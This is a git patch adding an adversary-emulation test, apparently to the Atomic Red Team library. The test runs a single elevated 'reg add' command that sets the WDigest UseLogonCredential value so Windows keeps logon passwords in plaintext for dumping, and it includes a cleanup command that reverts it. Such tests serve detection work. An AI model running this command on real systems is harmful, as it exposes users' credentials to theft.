From 8b855a513909676e8deb314b7bf6e21d9bb8b7fa Mon Sep 17 00:00:00 2001
From: JB <35406993+cherokeejb@users.noreply.github.com>
Date: Tue, 17 Sep 2019 09:44:55 -0500
Subject: [PATCH] Added new atomic, 'Modify registry for password downgrade to
 plain text' (#566)

* Added new atomic, 'Modify registry for password downgrade to plain text'

* fixed syntax on executor
---
 atomics/T1112/T1112.yaml | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index a96b019f..30cb9093 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -87,3 +87,16 @@ atomic_tests:
       ### Garbage collection and closing of ntuser.dat ###
       [gc]::Collect()
       reg unload "HKU\$($ProfileList[$p].SID)"
+
+- name: Modify registry for password downgrade to plain text
+  description: |
+    Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping) 
+  supported_platforms:
+    - windows
+  executor:
+      name: command_prompt
+      elevation_required: true
+      command: |
+        reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+      cleanup_command: |
+        reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f